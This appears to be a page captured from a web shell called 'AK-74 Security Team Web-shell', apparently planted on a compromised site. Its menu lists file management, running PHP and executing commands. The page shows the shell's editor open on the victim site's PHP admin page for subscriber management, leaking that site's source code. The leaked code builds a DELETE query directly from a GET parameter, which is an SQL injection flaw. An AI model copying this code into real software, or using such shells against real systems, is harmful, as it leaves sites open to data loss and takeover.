.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<?php include_once 'inc/function.php'; include_once('inc/paginator.class.php'); $admin=new Admin(); $pages = new Paginator; $weburl=substr($_SERVER['QUERY_STRING'],strlen($_GET['page'])+15); $query = "SELECT * FROM `subscribe`"; $get_rows=$admin->get_rows_by_query($db,$query); $per_page=50; $start=($_GET['page']-1)*$per_page; $pagination = $pages->displayHtmlPages($_GET['page'],$get_rows,$per_page,$weburl); if(isset($_GET['action'])){ if($_GET['action']=='delete'){ mysqli_query($db,"DELETE FROM `subscribe` WHERE id='".$_GET['id']."'"); $_SESSION['success']="Subscribe Deleted Successfully"; } } include_once 'inc/header.php'; ?> <div id="content" class="container-fluid"> <ol class="breadcrumb"> <li>Home</li> <li>Subscribe Management</li> <li>View Subscribe</li> </ol> <?php if(!empty($_SESSION['success'])) { ?> <div class="alert alert-success"> <strong>Success!</strong> <?=$_SESSION['success']?> </div> <?php unset($_SESSION['success']); } ?> <div class="panel panel-default"> <div class="panel-heading"> <h1 class="panel-title"><i class="fa fa-at"></i> View Subscribe</h1> </div> <div class="panel-body"> <form method="post" id="table-enquiry"> <div class="table-responsive"> <table class="table table-striped table-bordered table-hover"> <tr> <th class="text-left">S.No.</th> <th class="text-left">Email</th> <th class="text-left">Date</th> </tr> <?php $i=$start+1; $apps=$admin->get_filter_data_by_page_id($db,$query,$start,$per_page,'id','desc'); foreach($apps as $app): extract($app); ?> <tr> <td class="text-left"><?=$i?></td> <td class="text-left"><?=$email?></td> <td class="text-left"><?=date('d.M.Y',strtotime($date))?></td> </tr> <?php $i++; endforeach; ?> <?php if($get_rows==0){ ?> <tr> <td class="text-center danger" colspan="3"><p> </p><h4>Sorry, No Data Found</h4></td> </tr> <?php } ?> </table> <center> <ul class="pagination"> <?php print_r($pagination); ?> </ul> </center> </div> </form> </div> </div> </div> <?php include_once 'inc/footer.php'; ?> <script type="text/javascript" src="<?=ADMINURL?>/js/system.js"></script>
Rename:
-